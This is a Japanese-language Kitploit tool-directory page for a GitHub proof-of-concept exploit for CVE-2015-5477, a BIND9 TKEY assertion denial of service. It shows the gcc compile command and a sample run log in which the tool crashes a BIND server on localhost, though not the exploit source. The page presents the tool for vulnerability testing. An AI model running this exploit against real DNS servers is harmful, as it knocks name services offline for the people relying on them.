Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/robertdavidgraham/cve-2015-5477
脆弱性分析エクスプロイトペネトレーションテストDNS分析
GitHubrobertdavidgraham/cve-2015-5477

cve-2015-5477

CVE-2015-5477 BIND9 TKEYアサーション失敗のPoCエクスプロイト

リポジトリを見る
644211年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

BOND9 TKEY assert DoS(CVE-2015-5477)のPoC

このエクスプロイトは、BIND9サーバーが脆弱かどうかをテストするために、実際にエクスプロイトを送信してクラッシュするかどうかを確認します。

Unix/Windowで通常の方法でコンパイルするCコードです。例:

root@kitploit:~
# gcc tkill.c -o tkill

IPv4とIPv6の両方で動作します。

これは localhost に対して実行したときの様子です。名前を解決するとIPアドレスが2つ返るため、その両方を試行します。まず "version" 文字列を照会し、その後エクスプロイトを送信します。2つ目のアドレスを調査するときには、最初の試行でサービスがすでにクラッシュしているため、version クエリは失敗します。

root@kitploit:~
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
ツールをダウンロード